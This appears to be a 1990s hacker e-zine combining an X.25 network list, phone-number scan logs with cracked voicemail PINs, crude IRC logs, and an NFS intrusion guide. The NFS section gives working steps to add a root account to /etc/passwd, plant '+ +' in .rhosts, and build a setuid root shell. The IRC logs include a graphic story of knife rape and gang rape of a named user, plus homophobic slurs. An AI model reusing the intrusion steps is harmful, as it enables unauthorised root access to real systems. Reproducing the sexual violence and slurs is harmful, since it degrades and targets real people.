NAMIBIA SWANET 6490 BI-DIR
NEPAL NEPPACK 4290 BI-DIR
NETHERLAND ANTILLE DATANET 3621 BI-DIR
NETHERLANDS DATANET-1 2040 BI-DIR
DATANET-1 2041 BI-DIR
DABAS 2044 BI-DIR
DATANET-1 2049 BI-DIR
TRIONET 2057 BI-DIR
N. MARIANAS PACNET 5351 BI-DIR
NEW CALEDONIA TOMPAC 5460 BI-DIR
NEW ZEALAND PACNET 5301 BI-DIR
NICARAGUA NICAPAC 7100 BI-DIR
NIGER NIGERPAC 6142 BI-DIR
NORWAY DATAPAC TTX 2421 BI-DIR
DATAPAK 2422 BI-DIR
FDPAK 2431 BI-DIR
PAKISTAN PAKNET 4100 BI-DIR
PAKNET 2352 BI-DIR
PANAMA INTELPAQ 7141 BI-DIR
INTELPAQ 7142 BI-DIR
PAPUA-NEW GUINEA PANGPAC 5053 BI-DIR
PARAGUAY ANTELPAC 7447 BI-DIR
PERU DICOTEL 7160 BI-DIR
PHILIPPINES CAPWIRE 5151 BI-DIR
PGC 5152 BI-DIR
GLOBENET 5154 BI-DIR
ETPI 5156 BI-DIR
ETPI 5157 BI-DIR
POLAND POLPAK 2601 BI-DIR
POLPAK 2602 BI-DIR
PKONET 2605 BI-DIR
TELBANK-P 2603 BI-DIR
PORTUGAL TELEPAC 2680 BI-DIR
SABD 2682 BI-DIR
PUERTO RICO UDTS 3300 BI-DIR
UDTS 3301 BI-DIR
QATAR DOHPAC 4271 BI-DIR
REUNION (FR) TRANSPAC 2080 BI-DIR
RUSSIA RUSPAC 2500 BI-DIR
INFOTEL 2503 BI-DIR
INFOTEL 2504 BI-DIR
RWANDA RWANDA 6352 BI-DIR
SAN MARINO X-NET 2922 BI-DIR
SAUDI ARABIA ALWASEED 4201 BI-DIR
SENEGAL SENPAC 6081 BI-DIR
SEYCHELLES INFOLINK 6331 BI-DIR
SINGAPORE TELEPAC 5252 BI-DIR
TELEPAC 5257 BI-DIR
SLOVENIA SIPAX 2931 BI-DIR
SIPAX.X25 2932 BI-DIR
SOLOMON ISLANDS DATANET 5400 BI-DIR
TELEPAC 5401 BI-DIR
SLOVENIA SIPAX 2931 BI-DIR
SIPAX.X25 2932 BI-DIR
SOLOMON ISLANDS DATANET 5400 BI-DIR
TELEPAC 5401 BI-DIR
SOUTH AFRICA SAPONET 6550 BI-DIR
SAPONET 6551 BI-DIR
SAPONET 6559 BI-DIR
SPAIN TIDA 2141 BI-DIR
IBERPAC 2145 BI-DIR
SRI-LANKA DATANET 4132 BI-DIR
SWEDEN DATAPAK TTX 2401 BI-DIR
DATAPAK-2 2403 BI-DIR
TELENORDIA 2405 BI-DIR
DATAPAK-2 2407 BI-DIR
DATAPAK-2 2044 BI-DIR
DATAPAK-2 2046 BI-DIR
SWITZERLAND TELEPAC 2284 BI-DIR
TELEPAC 2285 BI-DIR
TELEPAC 2289 BI-DIR
TAIWAN PACNET 4873 BI-DIR
UDAS 4876 BI-DIR
UDAS 4877 BI-DIR
TCHECOSLOVAKA EURO-PRAHA 2301 BI-DIR
THAILAND THAIPAC 5200 BI-DIR
THAIPAC II 5202 BI-DIR
IDAR 5201 BI-DIR
TONGA DATAPAK 5390 BI-DIR
TOGOLESE REP. TOGOPAC 6152 BI-DIR
TORTOLA IDAS 3483 INCOMING
TRINIDAD DATANETT 3745 BI-DIR
TEXTET 3740 BI-DIR
TUNISIA RED25 6050 BI-DIR
TURKEY TURPAC 2862 BI-DIR
TURPAC 2863 BI-DIR
TURKS&CAICOS IDAS 3763 INCOMING
U ARAB EMIRATES EMDAN 4241 BI-DIR
EMDAN 4243 BI-DIR
TEDAS 4310 INCOMING
UKRAINE UKRPAC 2550 BI-DIR
URUGUAY URUPAC 7482 BI-DIR
URUPAC 7489 BI-DIR
USSR IASNET 2502 BI-DIR
U.S. VIRGIN I UDTS 3320 BI-DIR
U. KINGDOM IPSS-BTI 2341 BI-DIR
PSS-BT 2342 BI-DIR
GNS-BT-UK 2343 BI-DIR
GNS-BT-EUR 2344 BI-DIR
MERCURY 2350 BI-DIR
MERCURY 2351 BI-DIR
HULL 2352 BI-DIR
VANUATU VIAPAC 5410 BI-DIR
VENEZUELA VENEXPAQ 7342 BI-DIR
YUGOSLAVIA YUGOPAC 2201 BI-DIR
ZIMBABWE ZIMNET 6484 BI-DIR


For terminals of phone center subscriber (PBX, second lines etc..) 2 more
digits will be added. For example the number 2ABCDEFGH will be 2ABCDEFGHxx
or 2022ABCDEFGHxx. The subscribers that are not permanent connected to
Hellaspac are calling the number 1161 (national 4 digits number) in
order to connect. Then they give their identification number. And a lil'
ascii schematic:


|~~~~~~~~~~|
|Subscriber| |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|Your home | | |~~~~~~| |
| computer | | |Center| |
|__________| | |______| |
| | | |
| | | |
___|___ The telephone network | _______ ___|_ |~~~~~~| |
|Modem|-------------------------|--|Modem|-----|PAD|----|Center| |
~~~~~~~ (PSTN) | ~~~~~~~ ~~~|~ |______| |
| | |
| | |
| |~~~~~~| |
| |Center| |
| |______| |
| HELLASPAC |
|___________________________________|


This identification is called NUI (Network User Identification). The
NUI's Format is something like this XXXXXXXXBBBBB....B
where XXXXXXXX is the 8 digit national number and the BBBB...B is the
secret alphanumeric code which the subscriber has (uniqe for each
subscriber). The secret code consists from as many characters as you want
(consists from n characters top).

These networks choose 2 different ways to handle the data. In the next
ascii scheme i'll show and describe these ways.


(1st way)

-------|~~~~~~~~~~~|--|A|--|B|-|C|-----|~~~~~~~~~~|--------
| | | |
| | | |
-------| Center |------|D|--|E|-----| Center |--------
| (Bone) | | (Bone) |
| | | |
-------|___________|-----|F|-----------|__________|--------


With the circuit switched links the data flow for each communication
in different "streets". The data are being send in different rates. The
connection has two choices. Either to stay as it is between the senders
or get re-establish and terminated for each data send.


(2nd way)

------\
\ |~~~~~~| |~~~~~~|
--------\_____|Center|__|A|__|B|__|C|_|D|__|E|_|F|___|Center|
/ |(Bone)| |(Bone)|
-------/ |______| |______|


With the packet switched link a connection isn't a real connection!
The data is carried in packets. Each packet conteins the receivers address
and each packet is "saved" and redirected in the network bones. Though in
the terminals the user assumes that there is a connection.
The advantage of this method is that each link is used for many
"connections" and that 2 users can have different speeds. There are two
methods for packet swithcing, one is Datagram and the other are the
virtual circuit. These methods differe for their way of handling the
data of the address of the receiver and from the way that they redirect
the packets in the receiver through the network bones.


The Datagram method:
~~~~~~~~~~~~~~~~~~~~~~
With datagram each packet is send with the full receiver's address and
with increased number. This address is being anylized in each bone. Thus
the packets can travel from different "streets" in order to get to the
receiver. So the receiver will get the packets but they might be in a
different order from the order that the sender sent them.


The Virtual Circuit method:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In this method in order for a terminal to connect to another it has
first to send a packet (call request packet). This packet includes the
number of the terminal that is calling and the number of the
  
terminal
that is called. So the call request packet establishes a "logic" circuit
through the network to the receiver.

In each link of every bone the connection is characterized by a number
of "logic" channel. This number is used as an address for the packets that
will follow. With this method the Subscriber A can have two connections.
As shown in the scheme the subsriber A is connected to B and C in the
same time.


|~~~~~~~~~~~~~~~~~~~~~~~|
| | |~~~~~~~~~~|
| |~~|--|-|4|-----|Subscriber|
| |--|5|--|K2| | | C |
|~~~~~~~~~~~| | | |__| | ~~~~~~~~~~~~
|Subscriber | | |~~| | |
| A |-|1|---|2|---|--|1|-|K1| |7| |
~~~~~~~~~~~~~ | |__| | |
| | |~~| | |~~~~~~~~~~|
| |--|7|--|K3|--|-|3|----|Subscriber|
| |__| | | B |
| Hellaspac | ~~~~~~~~~~~~
|_______________________|



For the connection from the A to C we have from A to K1 the logic channel
1. From K1 to K2 the logic channel 5, from K2 to C the logic channel 4.
From K1 to K3 the logic channel 7 from K3 to B the logic channel 3 and last
from K2 to K3 the logic channel 7. As we can se in the same link we can
have more than one logic channels.

Each bone with the call request packet knows where to redirect the
packets that it accepts. These packets though are "saved" in each bone
and are getting in an order so that they could leave from the outline.

Closin'
~~~~~~~~~
Well that was it. Hope you enjoy it, as always I'll close up with
greetings on channels #9x #grhack #banana #b4b0 #darkcyde #bluebox (IRCnet)
#hax (IRCnet). Special thanxx to the teams 9x b4b0 and d4rkcyde.

By The Monty


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ o8oo scans ]::::::::[OO--[ by force ]---[ force007@hotmail.com ]:::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

' the human toneloc '

ans...answerphone
na....no answer
rec...recording
mm....meridian mail
vmb...voice mail box

o8oo 393ooo-3932oo
--oOo-------------

oo2 ans yorkshire electricity leaflet line
oo3 na
oo4 na
oo6 rec the vodaphone you have called may be switched off
oo7 vmb one attempt
o1o gay rec 'cablecom...number 0ne on the phone'
o11 same as above
o12 ans
o13 some call answering service
o14 na
o16 ans
o17 na
o18 na
o19 carrier - +++
o2o vmb mm nortel networks euro resoursing
o21 na
o25 na
o26 ans
o28 ans
o29 na
o3o ans
o33 vmb mm
o34 vmb mm
o35 na
o36 ans
o38 ans challenge hotline
o42 pbx vmb mm meridian switch instalation centre
o43 na
o44 vmb mm resource control for city of london
o45 na
o46 vmb mm resource control for westminster
o5o v [at 3am!]
o53 na
o55 na
o56 na
o57 ans
o59 na
o6o na
o62 ans
o63 na
o65 v
o67 na
o69 na
o7o ans noise hotline
o72 ans
o74 na
o75 m - no response
o76 ring then bubbly ring then fax
o77 gay ans/vmb
o78 fax
o79 na
o8o rings picks up hangs up
o81 na
o82 ans
o84 water leakage line press *# enter id
o87 m - no response
o89 v
o92 na
o93 v transfered to security dept
o94 na
o95 ans
o96 fax
o97 ans
o98 ans
o99 v
1oo m - user access verification username:
1o4 ans
1o5 na
1o6 bt sorry the number is not available
1o7 na
1o8 v
1o9 na
11o v eclipse screen line
111 ans
112 ans
113 ans
114 bt sorry the number is not available
115 fax
116 fax
118 na
123 v
125 v
126 na
127 na
128 ans
129 m -
13o v something international
132 na
134 v hello?
135 na
136 na
137 v something cars [vodaphone]
14o rec
141 pabx copytakers mm switch [interesting]
142 short beep then nothing
143 v
146 v microspeakers
147 rec telecom eire # not in service
148 bt call minder
151 rings twice then hangs up
152 vmb mm bt phonecard sales
153 na
156 v
157 v
158 bt call minder
159 ans
16o ans
161 na
163 na
164 changed to o1454 618422
166 bt pabx [info on directory inquires and phone book sales]
168 bt sorry # not available
169 ans
17o vodaphone recall service for o7887 565862
172 bt sorry # not available
174 na
176 bt pabx [info on directory inquires and phone book sales]
177 na
178 forwarded to vms * security code
179 ans
18o fax
184 na
186 v bt faults
19o ans
192 na
197 vms english mm
198 pbx vms press * for user id
199 v super-rod
2oo rec compaq

o8oo 132ooo-1322oo
--oOo-------------

oo1 company recording
oo3 'this is the bt freephone portability test announcement'
oo4 vmb
oo5 ans
oo6 crap ans sounded like he was underwater
oo9 na
o1o 'this service is currently unavailable'
o12 b
o15 'sorry this info line has closed'
o16 na
o18 company recording
o22 v
o23 na
o25 v
o26 na
o27 na
o29 na
o3o weird beeps
o31 fax
o32 v
o34 'the vodaphone you have called may be switched off'
o35 fax
o36 beeps on pickup then nothing
o37 v someone *shouts* 'HELLO!'
o38 ans beeps at keypresses
o39 na
o4O v 'dms message paging, only for emergancy pages, did you wish
to page anybody?'
o41 weird bubbly noise
o42 na
o45 vms audix
o47 crap vmb/ans
o48 fax
o49 v
o5O v
o51 na
o52 na
o53 na
o54 v midlands electricity
o57 na
o59 ans p=15 jrm painters and decorators
o61 na
o62 'this number is temp out of order'
o63 ans brockland services
o66 na
o67 v greenflag glassline
o68 na
o69 fax
o7o vms atlas copco press XXXX then # during the message
o71 long beep then nothing press anything it beeps then hangs up
o72 m/f won't connect
o74 na
o75 ans body and action press * for security code 2 digit
o77 na
o78 your session cannot be continued at this time please try later
o79 fax
o8o na
o81 ans city of swansea public lighting section
o82 ans owen mitchell press office
o83 m - no response
o84 v hellooooo...?
o86 ans teleservices
o87 fax
o88 ans press # for security code
o89 v blockbuster plumbing
o9O ans virgin balloon flights
o91 v rac fleet services
o92 na
o96 ans p=1234 youngs catering hotline
o98 ans a woman called john!$#%
o99 na
1oo na
1o1 na
1o3 v sibs cars
1o4 ans actionline
1o6 ans thompson and brian
1o7 ans kuwait helpline!
1o8 ans west midlands cleaning services
1o9 m - annex command line interpreter annex username:
111 v atm
112 na
115 v scotlands yule services
117 na
12o na
121 na
124 tone
125 ans
128 na
129 v monitoring centre
13o orange answering service for amatuer stock taking organisation
132 busy
136 changed to o1285 72o164
137 ans apex construction p=1
138 the number you have called is not currently in service call our
helpline on o117 9767872
14o na
142 ans nick page insurance
143 na
144 m - sun mac glasgow - press ctrl-e
145 na
146 orange answering service for ferric removals
147 na
149 basic vms
151 na
153 vms welcome to batten press #* for user id
154 fax
155 v martian helpline sounded american or some strong accent
156 ans thanks for calling the network press # enter id
157 v eyetex
158 forwarded to fax
16o vms english mm
163 na
165 recording ppp healthcare press o to make it ring somewhere
166 na
167 v gp emergency centre
168 na
169 beeps on pickup then nothing hangs up after a few keypresses
17o na
175 na
176 na
177 vms audix bank of scotland
179 fax
18o vodaphone answering service for o385 3244o7
181 ans greenline driving school
183 v sarasons storm force
185 na
187 na
189 ans fisher and pike?
19o ans some college
191 vms message centre
192 recording ppp healthcare
194 ans
195 vms
196 na
198 na
199 ans
2oo na

force...
--oOo---

force007@hotmail.com
uk vmb o8oo 919355
us vmb 18oo 331o17, 6, 4328

i'm clear in my mind but my soul is mad

<force-> would you think it was funny if i stuck my dick in your ear?
<call> depends which ear


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ IRC logz ]:::::::::::::[OO--[ by j0O ]---[ ]::::::::::::::::::::::
-->[OO]:::::::::::::::::::::::::::::::[ ]::::::::::::::::::::::::::::::::::


IRC LOGS
--------

1. force's fun in #gaychub
2. cyborg gets all erotic for op's
3. force begs cyborg for cybOr-he4d
4. cyborg and force talk about birthday cellebrations
5. force is obligated to fuck his girlfriend's mother
6. a few weeks later
7. zc2 and cyborg give a lesson on channel security
8. random irc qoutes collected by cyborg


iRC logs
--oOo---

* fORCE is now known as har0ld
* har0ld has joined #gaychub
<har0ld> hi
<fatbear> hi, you like huge fat tits?
<har0ld> yeah!
<har0ld> you got huge fat tits?
<fatbear> my tits stick out almost 3" from my chest, nipples 1 1/2"
wide and 1/2" long when erect. tits big enough that I can
grab one and put my nipple to my tongue
<har0ld> wow!
<har0ld> you have a pic?
<fatbear> sorry, don't have any pics or scanner. so, what would you
like to do with huge bear boobs like mine to get yourself
off?
<har0ld> i'd grab your tits and stretch them down past your waist, let
em go and watch em both spring up in ya face
<har0ld> then i'd spread nutella on them
<har0ld> and lick it off so much that you bleed
<fatbear> well, they can't reach quite that far. what's nutella?
<har0ld> peanut butter shit
<fatbear> maybe you'd like to suck and lick my huge mammaries, get
them slick so your can boob fuck me
<har0ld> maybe
<fatbear> feel my huge hairy boobs, giant hard nipples running up and
down the length of your long manmeat
<har0ld> oh baby
<har0ld> i'm getting hot
<fatbear> nipples bigger than some guys' cockheads, rubbing and
teasing your huge glans
<fatbear> tit hair poking into your piss lips
<fatbear> push my bear boobs together, wrapped around your huge dong
in my hairy cleavage
<har0ld> mmm
<fatbear> feel the nest of hair in the valley between my boobs
surrounding and caressing your cockhead
<har0ld> do you have hairy bum clevage too?
<fatbear> just a little. also have a big fat hairy navel
<har0ld> eeewww

<tex24> get a life
<har0ld> eat me
<tex24> eat my ass
<har0ld> no you'd enjoy it FAG

...[cyborg gets all er0t1c for ops]

<_Cyborg> ill pretend to read you a story about a beautiful grl who
seduces you if u like
<_Cyborg> but you must get me opped in return heh
<force-> r34d t0 m3
<_Cyborg> agree to the deal first
<force-> ok
<_Cyborg> one day a hot chick had her car broke down i the middle of
Basingstoke...
<_Cyborg> she had nowhere to go but saw a house
<_Cyborg> the house was lonesome looking, with a single occupant, a
lonely person, a hax0r named force
<_Cyborg> she knocked on the door, a hard firm knock
<force-> this story had better be an 18 certificate or i'm taking it
back
<_Cyborg> *kn0ck* *kn0ck*
<_Cyborg> it is
<_Cyborg> its toatlly hardcore be patient
<_Cyborg> im trying to build it up
<_Cyborg> -----
<force-> haha
<force-> ok
<force-> rEaD 0n
<_Cyborg> a guy answered the door, he was answered slowly "
cum inside"
<_Cyborg> she lifted her hair out of the rain and walked inside
<_Cyborg> she rubbed her left breast slowly up and down taunting the
lonesome phreak with her strides of sexual energy
<force-> LOL
<_Cyborg> force slammed the door, *hard*
<_Cyborg> he typed his away msg and unhooked the phone...
<_Cyborg> the grl put on music and a porn movie of old ppl fuckin hard
<_Cyborg> he was nervous "
would you like a towel?" he said
<_Cyborg> he took the towel and licked it and then started to rub it
along her pubic hairline amking gentle noises slowly...
<_Cyborg> force was weak.. he jumped to the ground and screamed "
i know
i am not worthy, but give me mercy, show me a night of
passion and i will be your slave!"
<_Cyborg> but he was already a sexual slave....
<_Cyborg> she held him down.. he was too weak to stop her.
<_Cyborg> she ripped off her top and the young force started to gnaw at
her tits
<_Cyborg> sucking harder!!
<_Cyborg> she unziped his fly and oozed her tougne along her swelling
cock
<_Cyborg> up and down!!!
<_Cyborg> up and down!!!
<_Cyborg> up and down!!!
<_Cyborg> she slid her bottoms to the ground and pushed force agianst
the wall....
<_Cyborg> his hard dick, pushing, shoving, she was a fuck machine
<_Cyborg> pain!!
<_Cyborg> hard fuckin
<_Cyborg> force felt many emotions, pain, pleasure, sadness, happiness,
all at the same time
<_Cyborg> unf
<_Cyborg> uNf
<_Cyborg> uNF
<_Cyborg> unF!
<_Cyborg> UNF!
<_Cyborg> UNF!!
<_Cyborg> ahhhhhhhh, she screamed
<_Cyborg> "
stop it force" she begged
<_Cyborg> "
stop fuckin me wild you eltie bastard!" she wailed
<_Cyborg> but he wouldnt stop
<_Cyborg> the pain added to the please
<_Cyborg> pleasure
<_Cyborg> UNF!!! UNF!!! OHHHHH!! AHHH! YEAH BABY!!! *BABY*!!!
BABBBBYYYY!!!!

...[once again cyborg wants ops, evas1ve was someone on irc trying to
get z0mba's, force's and darkcyde's in general d0cs]

<[cyborg]> It was saturday, force and zomba were in blackpool at dns
con...
<[cyborg]> zomba said "
i have to go to the toilet" and left
<[cyborg]> force wa all alone when a strong buxom woman sat where she
had been....
<[cyborg]> she was innocent, with pretty, tight tits and a virgin smile
but their was something about her..
<[cyborg]> she introduced herself.. "
im evas1ve, who are you?"
<[cyborg]> force was intriguded to see that evas1ve was a young sexy
girl who truned him on....
<[cyborg]> force said "
eh.. um.. my name is Matt, do you wanna fuck?"
<[cyborg]> the question didn't startle her, she breathed hevily and
stuck her tougne out licking her finger slowly
<[cyborg]> force led her to an unknown warehouse
<[cyborg]> he pointed to a chair.. she sat on it
<[cyborg]> he strted to tie her up, *hard knots gripping her skin*
<[cyborg]> he pressed his lips against her breasts and started to undo
his pants..
<[cyborg]> when he undid his pants a knife fell out...
<force-> Y-FRONTS!
<[cyborg]> "
ahhhhh" she screamed
<[cyborg]> "
a kn1f3!!!" she struggled to get away
<force-> she was really running from the pebble-dashed y-fronts
<[cyborg]> force said "
i am force and i have been wanting to fuck you
with this blade ever since i heard about you"
<[cyborg]> he took the blade...
<[cyborg]> and said how he was going to shove it up her cunt..
<[cyborg]> fuck it hard
<[cyborg]> *fuck it hard*
<[cyborg]> *FUCK IT HARD*
<[cyborg]> FUCK THE BLADE!!
<[cyborg]> blood, screaming, panic, hardc0re knife fuck!!!
<[cyborg]> zomba came reeling through the door, "
wtf?" he screamed
<[cyborg]> force threww the knife to the ground
<[cyborg]> it fell with a *bang*
<[cyborg]> he pulled her clothes off,
<[cyborg]> she was crying, bloodsoaked, naked!!
<[cyborg]> force said "
zomba: this is that evas1ve chick and we are
gonna rub himlit and cum in her ear and buttfuck her"
<[cyborg]> so force and zomba took turns rapng her!!
<[cyborg]> yeah baby
<[cyborg]> *yeah baby*
<[cyborg]> *YEAH BABY*
<[cyborg]> *YEAAHH BAABBBYYY*
<[cyborg]> IM FUCKING THE FBI!!! OHHHH!! BITING FBI TIT!!! AHHHHA!!


...[force begs cyborg for cyber head]

<_Cyborg> i will give you siber secks
<_Cyborg> anything you want heh
<force-> i want cYb0r h34d innit
* _Cyborg grits his teeth and licks his lips...
<_Cyborg> here goes ok...
<_Cyborg> heh
<_Cyborg> not really though, that would be sick heh
<force-> you pussy
<force-> g1bb0r m3 h34d!!!

...[cyborg and force talk about birthday celebrations and people who
seek attention on their birthday]

*** [cyborg] changes topic to 'http://www.ecad.org/up/'
<[cyborg]> his 18th birthday was another fuckin a-s propaganda coup
<[cyborg]> getting people to send him cards sheesh!
<[cyborg]> h0h
<force-> hey! i'm 17 tommorow EVERYONE SEND ME CARDS!!!
<[cyborg]> heh
<[cyborg]> imagine people's reaction if you put that in the f4ith
<[cyborg]> everyonw would be like 'wtf is this?' heh
<force-> they'd say 'shit on me, he must be ereet!'

...[force is obligated to fuck his girlfriend's mother]

<fORCE-> you wank
<fORCE-> i have a girlfriend to do that stuff for me
<Cyborg`> oh yeah, and what do you do when your girlfriend is out of town?
<fORCE-> fuck her mom

... a few weeks later ...

<force-> well today is my birthday and its been the worst of my life
<force-> and my girlfriend is STILL ON HoLiDaY!#$%
<_Cyborg> fux0r h3r m0mma
<force-> erm n0
<_Cyborg> heh
<_Cyborg> but you said you would
<force-> no i didnt

...[zc2 and cyborg give a lesson on channel security]

This log is a meant as a guide to people who don't want their channels
taken over. We will go over all the mistakes Flacid made. Cyborg and
Zc2 did a takeover of #U2_4_Ever. Then minutes later they did another
takeover of #U2_Rulez.

[1] His first mistake.

*** Flacid sets mode: +o Zc2

[2] This guy is just fucking dumb.

*** Flacid sets mode: +o Cyborg

[3] If you want to keep a channel, load a bot in.

*** Quits: Flacid (Excess Flood)
*** Joins: Flacid (Flacid@1Cust107.tnt9.minneapolis.mn.da.uu.net)
<Flacid> hey op me
<Flacid> guyz
<Zc2> no
<Zc2> heh
*** Zc2 sets mode: -o Cyborg
*** Zc2 sets mode: +ik tAKeoVeR
*** Zc2 changes topic to 'tHiS cHaN iS noW RuN bY Zc2'
<Zc2> hehe

[4] No amount of arguing will help.

<Flacid> i will toast you
<Flacid> i swear op me or die
<Cyborg> heh
<Cyborg> sweet takeover
<Zc2> no
*** Zc2 sets mode: +o Cyborg
<Cyborg> h0h

[5] Don't make threats you can't keep.

<Flacid> do u wanna get g-lined
<Zc2> it dont even have a bot
<Zc2> yea. G-line me
<Zc2> Flacid: i am waiting for the G-LINE
<Cyborg> G-L1NE US F00l

[6] Be more careful in future. At this point Cyborg changed his nick
and ident but left his IP the same becuase he was too lazy and
Flacid was too stupid. He came in as J0E.

<J0E> can i have ops?
*** Quits: Riffs (Leaving)
<Flacid> u can hav ops
<Flacid> joe
<Zc2> me>#
<Zc2> ?
<J0E> thank you
<Zc2> me?
<Flacid> if you promise not to op him
<J0E> ok i promise
<Zc2> can i have ops?
<Zc2> can i have ops?
*** Flacid sets mode: +o J0E
<Zc2> hehe
*** J0E sets mode: -o Flacid
<Zc2> lol
<Zc2> LOL
*** J0E is now known as Cyborg___
<Cyborg___> LOL
<Zc2> loser
<Zc2> op me
*** Cyborg___ sets mode: +o Zc2
<Zc2> loser
<Zc2> hehe
<Flacid> ok i m fuckin pissed off
<Cyborg___> Flacid: you are the dumbest fuckin shit i ever saw
<Cyborg___> we just 0wned both your channels
<Zc2> [22:17] <Flacid> think im that stupid
<Zc2> [22:17] <Flacid> think im that stupid
<Zc2> [22:17] <Flacid> think im that stupid

...[random irc qoutes collected by cyborg]

<solo242> big pants are the devil's creation.

<holyblob> whats the port master?
<redshadow> holybob : the dude who makes sure boats dont clog his port

<simmeth> yeah and you sit in it cuz you don't know how to use a
bathroom you filthy pig fucking nut sucker..

<simmeth> the lord blessed him with a 15"
penis so he can fuck him self
in the ass

<n1s> stupid h0m0s3xu4l bots

<GaWd> why the fuck is this so boring
<GaWd> there are people in this channel
<GaWd> do something

<offisk> has anyone got a war dialler to use in UK

<PsychoSheep> whats wrong with mIRC?

<Chance`> I'm talking to the asshole Cyborg

<Chance`> Cyborg prepare to be port-phucked.

<teehee> willo <---------- cl00bag ##!$^@
<teehee> willo <---------- cl00bag ##!$^@
<teehee> willo <---------- cl00bag ##!$^@

<willo> cyborg is gay

<willo> op me

<teehee> op me h2so4
<willo> he wont op u and if he does hes stupid
*** h2so4 sets mode: +o teehee
*** teehee sets mode: +b *!*@usr195-kno.cableinet.co.uk
*** willo was kicked by Optix (Banned)

<^Silicon-Trip^> we like to keep it close and tight


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ NFS ]::::::::::::::::::[OO--[ by msinister ]---[ ]::::::::::::::::
-->[OO]:::::::::::::::::::::::::::::::[ ]:::::::::::::::::::::::::::::::::::


NFS or network file system is a remote file system/directory , that is
mounted from a remote unix host. the file system changes and data are saved
and retreived from the remote host.

What is it for and where is it used ? it is for computers, who do not want
enough space for a /usr/bin directory, which is usually just binaries. and
run more than one computer.

How are the directories mounted ? man mount / man showmount / man rpc.mountd.
or use this short explaination. "showmount -e host" shows you the directories
that can be mounted and which hosts are allowed.

example:

export list for x:
/usr program
/tmpusers1 math
/var/spool/mail (everyone can mount this)

you can also use "showmount -a host" to see which hosts are currently
mounting directories/FS's from the host.

example:

y.x:/tmpusers
z:/tmpusers1/bla
t:/tmp
t:/usr
t:/local
t:/tmpusers2


How do I abuse this ? first I'll discuss non-suid shit, which is definitely
harder to crack. Non-suid nfs means root has no access on the remote system
for read/write, he is like a regular, and where he has write access, it will
usually pop out to be nobody, and not root. But if it aint suid ? well you
can try to hack in the following steps. try to mount a user directory,
something like /home:

mount -t nfs wisdom:/home /tmp/mnt

now try to look in the directory for users, you can usually tell a user
directory for having files like .cshrc or .bashrc, etc. now that you've
found a user directory, lets say /home/baby go into /home and type

ls -l | grep buffy

you will now know the user id of the user most probably. Now if the NFS is
writeable all we need to do is to put a "+ +" line in the users .rhosts, and
we can t/o. but we have no access as root. lets use the uid we got before
echo a::uid:0::/:/bin/sh >>
/etc/passwd"

now su a, we can write now lets "
echo + + >> .rhosts". now lets rlogin
wisdom -l baby, it shouldnt ask us for a password, we're in. We are in. we
can now try to locally exploit the server.

So whats the big deal, about suid-nfs ? ah, now, if we had suid nfs. we'd
probably have to just about the same thing but, say you followed the same
steps, and entered the machine you can now

echo "
main(){setuid(0);setgid(0);system("/bin/sh");}" > ahm.c

now go into the shell u got using the rlogin. type "
gcc -o ahm ahm.c"

we're not done yet. now we logout, go to our mounted directory, and do:

chown root ./ahm
chmod 4755 ./ahm

Now we shall have our root. Log once again into the shell and type ./ahm
(dont forget the "
./" else it wouldnt work )
# id
uid=0(root) gid=0(root) groups=0(root)

nice heh?

see ya!

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ 1-800-454-22XX ]::::::[OO--[ by anon ]--[ ]:::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

1-800-454-22xx

00 - [Fiber Optic Design company]
01 - [Not avail. from calling area]
02 - [dead]
03 - [Not avail. from calling area]
04 - [at&t easy reach 800]
05 - [registration office .. mumble mumble]
06 - [at&t easy reach 800]
07 - [dead]
08 - [party trying to call doesn't accept calls from an anonymous number]
09 - [Not avail. from calling area]
10 - [at&t easy reach 800]
11 - [San Francis pub???]
12 - [Not avail. from calling area or dead]
13 - [dead]
14 - [United London ??]
15 - ["
Hello this is Shelia speaking, can i help you?" yeah, do u give good
head?]
16 - [Brick wires??]
17 - [Please enter your four digit pin cracked: 9999 :) frontier customer
service]
18 - [Not avail. from calling area]
19 - [invalid or blocked from my area code]
20 - ["
You have reached a non working toll free number" <-- sounds horny :>]
21 - [busy]
22 - [dead]
23 - ["
Hi baby want me to get you hot?" sex line]
24 - [carrier]
25 - [dead]
26 - [mohawk industries Florida]
27 - ["
Customer service, this is Jennifer"]
28 - [dead]
29 - [doesn't ring, sits there doing nothing]
30 - [dead]
31 - [dead]
32 - [at&t easy reach 800]
33 - [grafix systems company]
34 - [please enter your four digit pin, prolly frontier again 9999?]
35 - [plays weird tones loud, ear aches... fuck faces.. then goes dead]
36 - [doesn't ring, sits there doing nothing]
37 - ["
B A C planes how can i help you"]
38 - ["
Matthis and testry" ?? some lady]
39 - [US Health Care]
40 - [Not in service or can't be reached from my calling area]
41 - [Spar tech glasses ??]
42 - [dead]
43 - [Not in service or can't be reached from my calling area]
44 - [dead]
45 - [fax, ugh]
46 - [bear state chemical refridgeration department]
47 - [dead]
48 - [pager]
49 - [Search USA]
50 - [midlands financial group ??]
51 - [pager]
52 - [Welcome to statlanders pharmacy]
53 - [a bakery :)]
54 - [dead]
55 - [couldn't understand the hoe]
56 - [at&t easy reach 800]
57 - [couldn't understand her either]
58 - ["
Good afternoon ?takkedda?]
59 - [at&t easy reach 800]
60 - [Parkview apartments]
61 - [some guy "Hello"]
62 - [fast busy signal]
63 - [rings a few times then goes dead]
64 - [Praise the Lord Gospel ?]
65 - [Scripts Bank]
66 - [?? Joe speaking]
67 - [endless ring]
68 - [dead]
69 - [dead]
70 - [endless ring]
71 - [busy]
72 - [something athletes]
73 - ["Good morning California Saints"]
74 - [invalid or blocked from my area code]
75 - [some dork.. tells his phone number and asks if you want to talk to him]
76 - [Critter corral??]
77 - [fax, ugh]
78 - [fast busy]
79 - [dead]
80 - [the parts department ?]
81 - [trall shobby international services]
82 - [Illinois community college association]
83 - [dead]
84 - [American Kids something or other]
85 - [endless ring]
86 - [farmers insurance]
87 - [800.communications ??]
88 - [dead]
89 - ["Please enter your four digit pin" 9999 frontier thing i think AGAIN]
90 - [Tripple A]
